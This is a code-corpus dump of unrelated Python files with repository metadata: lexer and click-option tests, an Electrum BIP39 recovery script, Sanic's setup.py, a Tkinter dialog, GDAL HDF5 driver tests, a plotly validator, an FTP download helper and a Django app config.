return wrapper
class RegexConverter(BaseConverter):
def __init__(self, map: "Map", *args: Any, **kwargs: Any) -> None:
super().__init__(map, *args, **kwargs)
self.regex = args[0]
| 33.696629
| 119
| 0.642214
|
f4ad5d40a98c476cc27350aa4c7bf886ff5dfcd4
| 1,122
|
py
|
Python
|
sol/test_lexer.py
|
ianpreston/sol
|
469fff7f7aff8469e7a2731fbf4b06de0db78836
|
[
"MIT"
] | null | null | null |
sol/test_lexer.py
|
ianpreston/sol
|
469fff7f7aff8469e7a2731fbf4b06de0db78836
|
[
"MIT"
] | null | null | null |
sol/test_lexer.py
|
ianpreston/sol
|
469fff7f7aff8469e7a2731fbf4b06de0db78836
|
[
"MIT"
] | null | null | null |
from sol.lexer import Lexer, Token, TokenType
def test_assignment():
source = 'x := Object.clone'
lexer = Lexer(source)
tokens = lexer.iter_match_tokens()
tokens = list(tokens)
assert tokens == [
Token(TokenType.IDENT, 'x'),
Token(TokenType.OPER, ':='),
Token(TokenType.IDENT, 'Object'),
Token(TokenType.DOT, '.'),
Token(TokenType.IDENT, 'clone'),
Token(TokenType.EOF, 'EOF'),
]
def test_string():
source = 'x := "Hello world"'
lexer = Lexer(source)
tokens = lexer.iter_match_tokens()
tokens = list(tokens)
assert tokens == [
Token(TokenType.IDENT, 'x'),
Token(TokenType.OPER, ':='),
Token(TokenType.STRING, 'Hello world'),
Token(TokenType.EOF, 'EOF'),
]
def test_multiple_idents():
source = 'a bar quux'
lexer = Lexer(source)
tokens = lexer.iter_match_tokens()
tokens = list(tokens)
assert tokens == [
Token(TokenType.IDENT, 'a'),
Token(TokenType.IDENT, 'bar'),
Token(TokenType.IDENT, 'quux'),
Token(TokenType.EOF, 'EOF'),
]
| 22.897959
| 47
| 0.582888
|
bd4135af844412519a6f855555c6e21968751b6a
| 4,202
|
py
|
Python
|
tests/test_prompt.py
|
nobody-65534/click-constrained-option
|
db9d3cbcf551b888cf4f38717d864a9c1e4568a9
|
[
"BSD-3-Clause"
] | null | null | null |
tests/test_prompt.py
|
nobody-65534/click-constrained-option
|
db9d3cbcf551b888cf4f38717d864a9c1e4568a9
|
[
"BSD-3-Clause"
] | null | null | null |
tests/test_prompt.py
|
nobody-65534/click-constrained-option
|
db9d3cbcf551b888cf4f38717d864a9c1e4568a9
|
[
"BSD-3-Clause"
] | null | null | null |
import re
import unittest
import click
from click.testing import CliRunner
from click_constrained_option import ConstrainedOption
class TestPrompt(unittest.TestCase):
def test_prompt_func(self):
@click.command()
@click.option("--a")
@click.option("--b", cls=ConstrainedOption, prompt_func=lambda a: a == '0')
def cli(**kwargs):
click.echo(kwargs)
runner = CliRunner()
result = runner.invoke(cli, ["--a=0"], input="1\n")
self.assertEqual(result.exit_code, 0)
self.assertDictEqual({'a': '0', 'b': '1'}, eval(re.findall(r".+", result.output)[-1]))
def test_prompt_if(self):
@click.command()
@click.option("--a")
@click.option("--b", cls=ConstrainedOption, prompt_if="a")
def cli(**kwargs):
click.echo(kwargs)
runner = CliRunner()
result = runner.invoke(cli, ["--a=0"], input="1\n")
self.assertEqual(result.exit_code, 0)
self.assertDictEqual({'a': '0', 'b': '1'}, eval(re.findall(r".+", result.output)[-1]))
def test_prompt_if_not(self):
@click.command()
@click.option("--a")
@click.option("--b", cls=ConstrainedOption, prompt_if_not="a")
def cli(**kwargs):
click.echo(kwargs)
runner = CliRunner()
result = runner.invoke(cli, [], input="0\n")
self.assertEqual(result.exit_code, 0)
self.assertDictEqual({'a': None, 'b': '0'}, eval(re.findall(r".+", result.output)[-1]))
def test_prompt_if_all_of(self):
@click.command()
@click.option("--a")
@click.option("--b")
@click.option("--c", cls=ConstrainedOption, prompt_if_all_of=["a", "b"])
def cli(**kwargs):
click.echo(kwargs)
runner = CliRunner()
result = runner.invoke(cli, ["--a=0", "--b=1"], input="3\n")
self.assertEqual(result.exit_code, 0)
self.assertDictEqual({'a': '0', 'b': '1', 'c': '3'}, eval(re.findall(r".+", result.output)[-1]))
def test_prompt_if_none_of(self):
@click.command()
@click.option("--a")
@click.option("--b")
@click.option("--c", cls=ConstrainedOption, prompt_if_none_of=["a", "b"])
def cli(**kwargs):
click.echo(kwargs)
runner = CliRunner()
result = runner.invoke(cli, [], input="0\n")
self.assertEqual(result.exit_code, 0)
self.assertDictEqual({'a': None, 'b': None, 'c': '0'}, eval(re.findall(r".+", result.output)[-1]))
def test_prompt_if_any_of(self):
@click.command()
@click.option("--a")
@click.option("--b")
@click.option("--c", cls=ConstrainedOption, prompt_if_any_of=["a", "b"])
def cli(**kwargs):
click.echo(kwargs)
runner = CliRunner()
result = runner.invoke(cli, ["--a=0"], input="1\n")
self.assertEqual(result.exit_code, 0)
self.assertDictEqual({'a': '0', 'b': None, 'c': '1'}, eval(re.findall(r".+", result.output)[-1]))
def test_prompt_if_one_of(self):
@click.command()
@click.option("--a")
@click.option("--b")
@click.option("--c", cls=ConstrainedOption, prompt_if_one_of=["a", "b"])
def cli(**kwargs):
click.echo(kwargs)
runner = CliRunner()
result = runner.invoke(cli, ["--a=0"], input="1\n")
self.assertEqual(result.exit_code, 0)
self.assertDictEqual({'a': '0', 'b': None, 'c': '1'}, eval(re.findall(r".+", result.output)[-1]))
def test_composition(self):
@click.command()
@click.option("--a")
@click.option("--b")
@click.option("--c")
@click.option("--d")
@click.option("--e", cls=ConstrainedOption, prompt_if="a", prompt_if_not="b", prompt_if_one_of=["c", "d"])
def cli(**kwargs):
click.echo(kwargs)
runner = CliRunner()
result = runner.invoke(cli, ["--a=0", "--c=1"], input="2\n")
self.assertEqual(result.exit_code, 0)
self.assertDictEqual({'a': '0', 'b': None, 'c': '1', 'd': None, 'e': '2'}, eval(re.findall(r".+", result.output)[-1]))
if __name__ == '__main__':
unittest.main()
| 33.616
| 126
| 0.554736
|
7034cbd365315f9239fbd832974a75f4c1eaca8d
| 1,345
|
py
|
Python
|
electrum_cintamani/scripts/bip39_recovery.py
|
sgmua8/electrum-dash
|
f7e6059fb07994867af3eebd1cd0c9789a0615d3
|
[
"MIT"
] | null | null | null |
electrum_cintamani/scripts/bip39_recovery.py
|
sgmua8/electrum-dash
|
f7e6059fb07994867af3eebd1cd0c9789a0615d3
|
[
"MIT"
] | null | null | null |
electrum_cintamani/scripts/bip39_recovery.py
|
sgmua8/electrum-dash
|
f7e6059fb07994867af3eebd1cd0c9789a0615d3
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python3
import sys
import asyncio
from electrum_cintamani.util import json_encode, print_msg, create_and_start_event_loop, log_exceptions
from electrum_cintamani.simple_config import SimpleConfig
from electrum_cintamani.network import Network
from electrum_cintamani.keystore import bip39_to_seed
from electrum_cintamani.bip32 import BIP32Node
from electrum_cintamani.bip39_recovery import account_discovery
try:
mnemonic = sys.argv[1]
passphrase = sys.argv[2] if len(sys.argv) > 2 else ""
except Exception:
print("usage: bip39_recovery <mnemonic> [<passphrase>]")
sys.exit(1)
loop, stopping_fut, loop_thread = create_and_start_event_loop()
config = SimpleConfig()
network = Network(config)
network.start()
@log_exceptions
async def f():
try:
def get_account_xpub(account_path):
root_seed = bip39_to_seed(mnemonic, passphrase)
root_node = BIP32Node.from_rootseed(root_seed, xtype="standard")
account_node = root_node.subkey_at_private_derivation(account_path)
account_xpub = account_node.to_xpub()
return account_xpub
active_accounts = await account_discovery(network, get_account_xpub)
print_msg(json_encode(active_accounts))
finally:
stopping_fut.set_result(1)
asyncio.run_coroutine_threadsafe(f(), loop)
| 32.804878
| 103
| 0.758364
|
fc19e20a5cb2dd172edd230c3f5a337eef9adf86
| 3,656
|
py
|
Python
|
setup.py
|
ddc67cd/sanic
|
150d75b7c6aa2346436f0eb895048c53976c98d4
|
[
"MIT"
] | null | null | null |
setup.py
|
ddc67cd/sanic
|
150d75b7c6aa2346436f0eb895048c53976c98d4
|
[
"MIT"
] | null | null | null |
setup.py
|
ddc67cd/sanic
|
150d75b7c6aa2346436f0eb895048c53976c98d4
|
[
"MIT"
] | null | null | null |
"""
Sanic
"""
import codecs
import os
import re
import sys
from distutils.util import strtobool
from setuptools import setup
from setuptools.command.test import test as TestCommand
class PyTest(TestCommand):
"""
Provide a Test runner to be used from setup.py to run unit tests
"""
user_options = [("pytest-args=", "a", "Arguments to pass to pytest")]
def initialize_options(self):
TestCommand.initialize_options(self)
self.pytest_args = ""
def run_tests(self):
import shlex
import pytest
errno = pytest.main(shlex.split(self.pytest_args))
sys.exit(errno)
def open_local(paths, mode="r", encoding="utf8"):
path = os.path.join(os.path.abspath(os.path.dirname(__file__)), *paths)
return codecs.open(path, mode, encoding)
with open_local(["sanic", "__version__.py"], encoding="latin1") as fp:
try:
version = re.findall(
r"^__version__ = \"([^']+)\"\r?$", fp.read(), re.M
)[0]
except IndexError:
raise RuntimeError("Unable to determine version.")
with open_local(["README.rst"]) as rm:
long_description = rm.read()
setup_kwargs = {
"name": "sanic",
"version": version,
"url": "http://github.com/huge-success/sanic/",
"license": "MIT",
"author": "Sanic Community",
"author_email": "admhpkns@gmail.com",
"description": (
"A web server and web framework that's written to go fast. Build fast. Run fast."
),
"long_description": long_description,
"packages": ["sanic"],
"package_data": {"sanic": ["py.typed"]},
"platforms": "any",
"python_requires": ">=3.6",
"classifiers": [
"Development Status :: 4 - Beta",
"Environment :: Web Environment",
"License :: OSI Approved :: MIT License",
"Programming Language :: Python :: 3.6",
"Programming Language :: Python :: 3.7",
"Programming Language :: Python :: 3.8",
"Programming Language :: Python :: 3.9",
],
"entry_points": {"console_scripts": ["sanic = sanic.__main__:main"]},
}
env_dependency = (
'; sys_platform != "win32" ' 'and implementation_name == "cpython"'
)
ujson = "ujson>=1.35" + env_dependency
uvloop = "uvloop>=0.5.3" + env_dependency
requirements = [
"httptools>=0.0.10",
uvloop,
ujson,
"aiofiles>=0.6.0",
"websockets>=8.1,<9.0",
"multidict>=5.0,<6.0",
"httpx==0.15.4",
]
tests_require = [
"pytest==5.2.1",
"multidict>=5.0,<6.0",
"gunicorn==20.0.4",
"pytest-cov",
"httpcore==0.11.*",
"beautifulsoup4",
uvloop,
ujson,
"pytest-sanic",
"pytest-sugar",
"pytest-benchmark",
"pytest-dependency",
]
docs_require = [
"sphinx>=2.1.2",
"sphinx_rtd_theme",
"recommonmark>=0.5.0",
"docutils",
"pygments",
]
dev_require = tests_require + [
"aiofiles",
"tox",
"black",
"flake8",
"bandit",
"towncrier",
]
all_require = dev_require + docs_require
if strtobool(os.environ.get("SANIC_NO_UJSON", "no")):
print("Installing without uJSON")
requirements.remove(ujson)
tests_require.remove(ujson)
# 'nt' means windows OS
if strtobool(os.environ.get("SANIC_NO_UVLOOP", "no")):
print("Installing without uvLoop")
requirements.remove(uvloop)
tests_require.remove(uvloop)
extras_require = {
"test": tests_require,
"dev": dev_require,
"docs": docs_require,
"all": all_require,
}
setup_kwargs["install_requires"] = requirements
setup_kwargs["tests_require"] = tests_require
setup_kwargs["extras_require"] = extras_require
setup_kwargs["cmdclass"] = {"test": PyTest}
setup(**setup_kwargs)
| 24.052632
| 89
| 0.623359
|
17801e9e466202eeec71ada65ca49688ba648bb1
| 969
|
py
|
Python
|
tanager_feeder/dialogs/new_dir_dialog.py
|
westernmarslab/tanager-feeder
|
59bc4d5deca474e2c915ea49aaba791f247de41f
|
[
"MIT"
] | null | null | null |
tanager_feeder/dialogs/new_dir_dialog.py
|
westernmarslab/tanager-feeder
|
59bc4d5deca474e2c915ea49aaba791f247de41f
|
[
"MIT"
] | null | null | null |
tanager_feeder/dialogs/new_dir_dialog.py
|
westernmarslab/tanager-feeder
|
59bc4d5deca474e2c915ea49aaba791f247de41f
|
[
"MIT"
] | 1
|
2021-04-23T00:03:46.000Z
|
2021-04-23T00:03:46.000Z
|
from tkinter import Entry
from tanager_feeder.dialogs.dialog import Dialog
class NewDirDialog(Dialog):
def __init__(self, controller, fexplorer, label="New directory name: ", title="New Directoy"):
super().__init__(
controller, label=label, title=title, buttons={"ok": {self.get: []}, "cancel": {}}, button_width=15
)
self.dir_entry = Entry(
self.top,
width=40,
bg=self.tk_format.entry_background,
selectbackground=self.tk_format.selectbackground,
selectforeground=self.tk_format.selectforeground,
)
self.dir_entry.pack(padx=(10, 10))
self.listener = self.controller.spec_listener
self.fexplorer = fexplorer
def get(self):
subdir = self.dir_entry.get()
if subdir[0:3] != "C:\\":
self.fexplorer.mkdir(self.fexplorer.current_parent + "\\" + subdir)
else:
self.fexplorer.mkdir(subdir)
| 35.888889
| 111
| 0.618163
|
a2aea9bde1b97b40d6b686cf8b8ff209ffe48660
| 15,224
|
py
|
Python
|
autotest/gdrivers/hdf5.py
|
oss-qm/gdal
|
bec8aaf79c337fc6ac3a6f18d66b320e48904854
|
[
"MIT"
] | null | null | null |
autotest/gdrivers/hdf5.py
|
oss-qm/gdal
|
bec8aaf79c337fc6ac3a6f18d66b320e48904854
|
[
"MIT"
] | null | null | null |
autotest/gdrivers/hdf5.py
|
oss-qm/gdal
|
bec8aaf79c337fc6ac3a6f18d66b320e48904854
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env pytest
# -*- coding: utf-8 -*-
###############################################################################
# $Id$
#
# Project: GDAL/OGR Test Suite
# Purpose: Test read functionality for HDF5 driver.
# Author: Even Rouault <even dot rouault at mines dash paris dot org>
#
###############################################################################
# Copyright (c) 2008-2013, Even Rouault <even dot rouault at mines-paris dot org>
#
# Permission is hereby granted, free of charge, to any person obtaining a
# copy of this software and associated documentation files (the "Software"),
# to deal in the Software without restriction, including without limitation
# the rights to use, copy, modify, merge, publish, distribute, sublicense,
# and/or sell copies of the Software, and to permit persons to whom the
# Software is furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included
# in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS
# OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL
# THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING
# FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER
# DEALINGS IN THE SOFTWARE.
###############################################################################
import shutil
import pytest
from osgeo import gdal
import gdaltest
from uffd import uffd_compare
###############################################################################
# Test if HDF5 driver is present
pytestmark = pytest.mark.require_driver('HDF5')
@pytest.fixture(autouse=True)
def check_no_file_leaks():
num_files = len(gdaltest.get_opened_files())
yield
diff = len(gdaltest.get_opened_files()) - num_files
assert diff == 0, 'Leak of file handles: %d leaked' % diff
###############################################################################
# Confirm expected subdataset information.
def test_hdf5_2():
ds = gdal.Open('data/groups.h5')
sds_list = ds.GetMetadata('SUBDATASETS')
assert len(sds_list) == 4, 'Did not get expected subdataset count.'
assert sds_list['SUBDATASET_1_NAME'] == 'HDF5:"data/groups.h5"://MyGroup/Group_A/dset2' and sds_list['SUBDATASET_2_NAME'] == 'HDF5:"data/groups.h5"://MyGroup/dset1', \
'did not get expected subdatasets.'
ds = None
assert not gdaltest.is_file_open('data/groups.h5'), 'file still opened.'
###############################################################################
# Confirm that single variable files can be accessed directly without
# subdataset stuff.
def test_hdf5_3():
ds = gdal.Open('HDF5:"data/u8be.h5"://TestArray')
cs = ds.GetRasterBand(1).Checksum()
assert cs == 135, 'did not get expected checksum'
ds = None
assert not gdaltest.is_file_open('data/u8be.h5'), 'file still opened.'
###############################################################################
# Confirm subdataset access, and checksum.
def test_hdf5_4():
ds = gdal.Open('HDF5:"data/u8be.h5"://TestArray')
cs = ds.GetRasterBand(1).Checksum()
assert cs == 135, 'did not get expected checksum'
###############################################################################
# Similar check on a 16bit dataset.
def test_hdf5_5():
ds = gdal.Open('HDF5:"data/groups.h5"://MyGroup/dset1')
cs = ds.GetRasterBand(1).Checksum()
assert cs == 18, 'did not get expected checksum'
###############################################################################
# Test generating an overview on a subdataset.
def test_hdf5_6():
shutil.copyfile('data/groups.h5', 'tmp/groups.h5')
ds = gdal.Open('HDF5:"tmp/groups.h5"://MyGroup/dset1')
ds.BuildOverviews(overviewlist=[2])
ds = None
assert not gdaltest.is_file_open('tmp/groups.h5'), 'file still opened.'
ds = gdal.Open('HDF5:"tmp/groups.h5"://MyGroup/dset1')
assert ds.GetRasterBand(1).GetOverviewCount() == 1, 'failed to find overview'
ds = None
# confirm that it works with a different path. (#3290)
ds = gdal.Open('HDF5:"data/../tmp/groups.h5"://MyGroup/dset1')
assert ds.GetRasterBand(1).GetOverviewCount() == 1, \
'failed to find overview with alternate path'
ovfile = ds.GetMetadataItem('OVERVIEW_FILE', 'OVERVIEWS')
assert ovfile[:11] == 'data/../tmp', 'did not get expected OVERVIEW_FILE.'
ds = None
gdaltest.clean_tmp()
###############################################################################
# Coarse metadata check (regression test for #2412).
def test_hdf5_7():
ds = gdal.Open('data/metadata.h5')
metadata = ds.GetMetadata()
metadataList = ds.GetMetadata_List()
ds = None
assert not gdaltest.is_file_open('data/metadata.h5'), 'file still opened.'
assert len(metadata) == len(metadataList), 'error in metadata dictionary setup'
metadataList = [item.split('=', 1)[0] for item in metadataList]
for key in metadataList:
try:
metadata.pop(key)
except KeyError:
pytest.fail('unable to find "%s" key' % key)
###############################################################################
# Test metadata names.
def test_hdf5_8():
ds = gdal.Open('data/metadata.h5')
metadata = ds.GetMetadata()
ds = None
assert metadata, 'no metadata found'
h5groups = ['G1', 'Group with spaces', 'Group_with_underscores',
'Group with spaces_and_underscores']
h5datasets = ['D1', 'Dataset with spaces', 'Dataset_with_underscores',
'Dataset with spaces_and_underscores']
attributes = {
'attribute': 'value',
'attribute with spaces': 0,
'attribute_with underscores': 0,
'attribute with spaces_and_underscores': .1,
}
def scanMetadata(parts):
for attr in attributes:
name = '_'.join(parts + [attr])
name = name.replace(' ', '_')
assert name in metadata, ('unable to find metadata: "%s"' % name)
value = metadata.pop(name)
value = value.strip(' d')
value = type(attributes[attr])(value)
assert value == attributes[attr], ('incorrect metadata value for "%s": '
'"%s" != "%s"' % (name, value,
attributes[attr]))
# level0
assert scanMetadata([]) is None
# level1 datasets
for h5dataset in h5datasets:
assert scanMetadata([h5dataset]) is None
# level1 groups
for h5group in h5groups:
assert scanMetadata([h5group]) is None
# level2 datasets
for h5dataset in h5datasets:
assert scanMetadata([h5group, h5dataset]) is None
###############################################################################
# Variable length string metadata check (regression test for #4228).
def test_hdf5_9():
if int(gdal.VersionInfo('VERSION_NUM')) < 1900:
pytest.skip('would crash')
ds = gdal.Open('data/vlstr_metadata.h5')
metadata = ds.GetRasterBand(1).GetMetadata()
ds = None
assert not gdaltest.is_file_open('data/vlstr_metadata.h5'), 'file still opened.'
ref_metadata = {
'TEST_BANDNAMES': 'SAA',
'TEST_CODING': '0.6666666667 0.0000000000 TRUE',
'TEST_FLAGS': '255=noValue',
'TEST_MAPPING': 'Geographic Lat/Lon 0.5000000000 0.5000000000 27.3154761905 -5.0833333333 0.0029761905 0.0029761905 WGS84 Degrees',
'TEST_NOVALUE': '255',
'TEST_RANGE': '0 255 0 255',
}
assert len(metadata) == len(ref_metadata), ('incorrect number of metadata: '
'expected %d, got %d' % (len(ref_metadata),
len(metadata)))
for key in metadata:
assert key in ref_metadata, ('unexpected metadata key "%s"' % key)
assert metadata[key] == ref_metadata[key], \
('incorrect metadata value for key "%s": '
'expected "%s", got "%s" ' %
(key, ref_metadata[key], metadata[key]))
###############################################################################
# Test CSK_DGM.h5 (#4160)
def test_hdf5_10():
# Try opening the QLK subdataset to check that no error is generated
gdal.ErrorReset()
ds = gdal.Open('HDF5:"data/CSK_DGM.h5"://S01/QLK')
assert ds is not None and gdal.GetLastErrorMsg() == ''
ds = None
ds = gdal.Open('HDF5:"data/CSK_DGM.h5"://S01/SBI')
got_gcpprojection = ds.GetGCPProjection()
assert got_gcpprojection.startswith('GEOGCS["WGS 84",DATUM["WGS_1984"')
got_gcps = ds.GetGCPs()
assert len(got_gcps) == 4
assert (abs(got_gcps[0].GCPPixel - 0) <= 1e-5 and abs(got_gcps[0].GCPLine - 0) <= 1e-5 and \
abs(got_gcps[0].GCPX - 12.2395902509238) <= 1e-5 and abs(got_gcps[0].GCPY - 44.7280047434954) <= 1e-5)
ds = None
assert not gdaltest.is_file_open('data/CSK_DGM.h5'), 'file still opened.'
###############################################################################
# Test CSK_GEC.h5 (#4160)
def test_hdf5_11():
# Try opening the QLK subdataset to check that no error is generated
gdal.ErrorReset()
ds = gdal.Open('HDF5:"data/CSK_GEC.h5"://S01/QLK')
assert ds is not None and gdal.GetLastErrorMsg() == ''
ds = None
ds = gdal.Open('HDF5:"data/CSK_GEC.h5"://S01/SBI')
got_projection = ds.GetProjection()
assert got_projection.startswith('PROJCS["Transverse_Mercator",GEOGCS["WGS 84",DATUM["WGS_1984"')
got_gt = ds.GetGeoTransform()
expected_gt = (275592.5, 2.5, 0.0, 4998152.5, 0.0, -2.5)
for i in range(6):
assert abs(got_gt[i] - expected_gt[i]) <= 1e-5
ds = None
assert not gdaltest.is_file_open('data/CSK_GEC.h5'), 'file still opened.'
###############################################################################
# Test ODIM_H5 (#5032)
def test_hdf5_12():
if not gdaltest.download_file('http://trac.osgeo.org/gdal/raw-attachment/ticket/5032/norsa.ss.ppi-00.5-dbz.aeqd-1000.20070601T000039Z.hdf', 'norsa.ss.ppi-00.5-dbz.aeqd-1000.20070601T000039Z.hdf'):
pytest.skip()
ds = gdal.Open('tmp/cache/norsa.ss.ppi-00.5-dbz.aeqd-1000.20070601T000039Z.hdf')
got_projection = ds.GetProjection()
assert 'Azimuthal_Equidistant' in got_projection
got_gt = ds.GetGeoTransform()
expected_gt = (-239999.9823595533, 997.9165855496311, 0.0, 239000.03320328312, 0.0, -997.9167782264051)
assert max([abs(got_gt[i] - expected_gt[i]) for i in range(6)]) <= 1e-5, got_gt
###############################################################################
# Test MODIS L2 HDF5 GCPs (#6666)
def test_hdf5_13():
if not gdaltest.download_file('http://oceandata.sci.gsfc.nasa.gov/cgi/getfile/A2016273115000.L2_LAC_OC.nc', 'A2016273115000.L2_LAC_OC.nc'):
pytest.skip()
ds = gdal.Open('HDF5:"tmp/cache/A2016273115000.L2_LAC_OC.nc"://geophysical_data/Kd_490')
got_gcps = ds.GetGCPs()
assert len(got_gcps) == 3030
assert (abs(got_gcps[0].GCPPixel - 0.5) <= 1e-5 and abs(got_gcps[0].GCPLine - 0.5) <= 1e-5 and \
abs(got_gcps[0].GCPX - 33.1655693) <= 1e-5 and abs(got_gcps[0].GCPY - 39.3207207) <= 1e-5)
###############################################################################
# Test complex data subsets
def test_hdf5_14():
ds = gdal.Open('data/complex.h5')
sds_list = ds.GetMetadata('SUBDATASETS')
assert len(sds_list) == 6, 'Did not get expected complex subdataset count.'
assert sds_list['SUBDATASET_1_NAME'] == 'HDF5:"data/complex.h5"://f16' and sds_list['SUBDATASET_2_NAME'] == 'HDF5:"data/complex.h5"://f32' and sds_list['SUBDATASET_3_NAME'] == 'HDF5:"data/complex.h5"://f64', \
'did not get expected subdatasets.'
ds = None
assert not gdaltest.is_file_open('data/complex.h5'), 'file still opened.'
###############################################################################
# Confirm complex subset data access and checksum
# Start with Float32
def test_hdf5_15():
ds = gdal.Open('HDF5:"data/complex.h5"://f32')
cs = ds.GetRasterBand(1).Checksum()
assert cs == 523, 'did not get expected checksum'
# Repeat for Float64
def test_hdf5_16():
ds = gdal.Open('HDF5:"data/complex.h5"://f64')
cs = ds.GetRasterBand(1).Checksum()
assert cs == 511, 'did not get expected checksum'
# Repeat for Float16
def test_hdf5_17():
ds = gdal.Open('HDF5:"data/complex.h5"://f16')
cs = ds.GetRasterBand(1).Checksum()
assert cs == 412, 'did not get expected checksum'
def test_hdf5_single_char_varname():
ds = gdal.Open('HDF5:"data/single_char_varname.h5"://e')
assert ds is not None
def test_hdf5_attr_all_datatypes():
ds = gdal.Open('data/attr_all_datatypes.h5')
assert ds is not None
assert ds.GetMetadata() == {'attr_float16': '125 ',
'attr_float32': '125 ',
'attr_float64': '125 ',
'attr_int16': '125 ',
'attr_int32': '125 ',
'attr_int8': '125 ',
'attr_uint16': '125 ',
'attr_uint32': '125 ',
'attr_uint8': '125 '}
def test_hdf5_virtual_file():
hdf5_files = [
'CSK_GEC.h5',
'vlstr_metadata.h5',
'groups.h5',
'complex.h5',
'single_char_varname.h5',
'CSK_DGM.h5',
'u8be.h5',
'metadata.h5'
]
for hdf5_file in hdf5_files:
assert uffd_compare(hdf5_file) is True
# FIXME: This FTP server seems to have disappeared. Replace with something else?
hdf5_list = [
('ftp://ftp.hdfgroup.uiuc.edu/pub/outgoing/hdf_files/hdf5/samples/convert', 'C1979091.h5',
'HDF4_PALGROUP/HDF4_PALETTE_2', 7488, -1),
('ftp://ftp.hdfgroup.uiuc.edu/pub/outgoing/hdf_files/hdf5/samples/convert', 'C1979091.h5',
'Raster_Image_#0', 3661, -1),
('ftp://ftp.hdfgroup.uiuc.edu/pub/outgoing/hdf_files/hdf5/geospatial/DEM', 'half_moon_bay.grid',
'HDFEOS/GRIDS/DEMGRID/Data_Fields/Elevation', 30863, -1),
]
@pytest.mark.parametrize(
'downloadURL,fileName,subdatasetname,checksum,download_size',
hdf5_list,
ids=['HDF5:"' + item[1] + '"://' + item[2] for item in hdf5_list],
)
def test_hdf5(downloadURL, fileName, subdatasetname, checksum, download_size):
if not gdaltest.download_file(downloadURL + '/' + fileName, fileName, download_size):
pytest.skip('no download')
ds = gdal.Open('HDF5:"tmp/cache/' + fileName + '"://' + subdatasetname)
assert ds.GetRasterBand(1).Checksum() == checksum, 'Bad checksum. Expected %d, got %d' % (checksum, ds.GetRasterBand(1).Checksum())
def test_hdf5_dimension_labels_with_null():
assert gdal.Open('data/dimension_labels_with_null.h5')
| 33.459341
| 213
| 0.583684
|
46dbc192eccdafd16e79757e75b47589e023a62b
| 601
|
py
|
Python
|
plotly/validators/scatterpolar/marker/colorbar/_showexponent.py
|
gnestor/plotly.py
|
a8ae062795ddbf9867b8578fe6d9e244948c15ff
|
[
"MIT"
] | 12
|
2020-04-18T18:10:22.000Z
|
2021-12-06T10:11:15.000Z
|
plotly/validators/scatterpolar/marker/colorbar/_showexponent.py
|
Vesauza/plotly.py
|
e53e626d59495d440341751f60aeff73ff365c28
|
[
"MIT"
] | 27
|
2020-04-28T21:23:12.000Z
|
2021-06-25T15:36:38.000Z
|
plotly/validators/scatterpolar/marker/colorbar/_showexponent.py
|
Vesauza/plotly.py
|
e53e626d59495d440341751f60aeff73ff365c28
|
[
"MIT"
] | 6
|
2020-04-18T23:07:08.000Z
|
2021-11-18T07:53:06.000Z
|
import _plotly_utils.basevalidators
class ShowexponentValidator(_plotly_utils.basevalidators.EnumeratedValidator):
def __init__(
self,
plotly_name='showexponent',
parent_name='scatterpolar.marker.colorbar',
**kwargs
):
super(ShowexponentValidator, self).__init__(
plotly_name=plotly_name,
parent_name=parent_name,
edit_type=kwargs.pop('edit_type', 'colorbars'),
role=kwargs.pop('role', 'style'),
values=kwargs.pop('values', ['all', 'first', 'last', 'none']),
**kwargs
)
| 30.05
| 78
| 0.613977
|
6a5f0cfc0d314d4b3cd2e0ecea86581feac805e8
| 1,615
|
py
|
Python
|
ftpConn.py
|
mastix/mqtt-ftp-downloader
|
0a7d1bec3831d690a90620948a668547f2f06a66
|
[
"MIT"
] | null | null | null |
ftpConn.py
|
mastix/mqtt-ftp-downloader
|
0a7d1bec3831d690a90620948a668547f2f06a66
|
[
"MIT"
] | null | null | null |
ftpConn.py
|
mastix/mqtt-ftp-downloader
|
0a7d1bec3831d690a90620948a668547f2f06a66
|
[
"MIT"
] | 1
|
2018-05-19T21:30:01.000Z
|
2018-05-19T21:30:01.000Z
|
"""
Script: ftpConn.py
Author: Sascha Sambale
Date: June 21st, 2016
Purpose: Accesses an FTP Server to download a given file from a given path.
"""
import ftplib
import logging
import tempfile
class FTPConnection(object):
def __init__(self):
self.logger = logging.getLogger('ftpDownloader')
self.ftp_conn = ftplib.FTP()
self.user = "user"
self.password = "password"
self.port = 21
self.path = "/"
self.local_path = tempfile.gettempdir() + "/"
self.host = "myHost"
def config(self, logger, user, password, host, port, path, local_path):
self.logger = logger
self.host = host
self.user = user
self.password = password
self.port = port
self.path = path
self.local_path = local_path
def download(self, filename):
self.ftp_conn = ftplib.FTP(str(self.host))
file_name = filename.split("/")
local_filename = filename
if len(file_name) > 1:
local_filename = file_name[len(file_name) - 1]
self.logger.info(
"Local filename must not contain a full path - will reduce to filename only!")
self.logger.info("Old file name: %s", filename)
self.logger.info("New file name: %s", local_filename)
file = open(self.local_path + local_filename, 'wb')
self.ftp_conn.cwd(self.path)
self.ftp_conn.retrbinary('RETR ' + filename, file.write)
self.logger.info("File downloaded: " + self.local_path + local_filename)
file.close()
self.ftp_conn.quit()
| 32.959184
| 98
| 0.611765
|
21ec3b67b28fe035bda6d06ef18c104618a96616
| 92
|
py
|
Python
|
ramlgnarok_test_app/raml_test/apps.py
|
pkucmus/ramlgnarok
|
620f062d4f8421c8c1a70dfdabb54fb08912e3cc
|
[
"MIT"
] | null | null | null |
ramlgnarok_test_app/raml_test/apps.py
|
pkucmus/ramlgnarok
|
620f062d4f8421c8c1a70dfdabb54fb08912e3cc
|
[
"MIT"
] | null | null | null |
ramlgnarok_test_app/raml_test/apps.py
|
pkucmus/ramlgnarok
|
620f062d4f8421c8c1a70dfdabb54fb08912e3cc
|
[
"MIT"
] | null | null | null |
from django.apps import AppConfig
class RamlTestConfig(AppConfig):
name = 'raml_test'
| 15.333333
| 33
| 0.76087
|
5ef6553aee61b81b4686b35be205dc561f3680fd
| 21,393
|
py
|
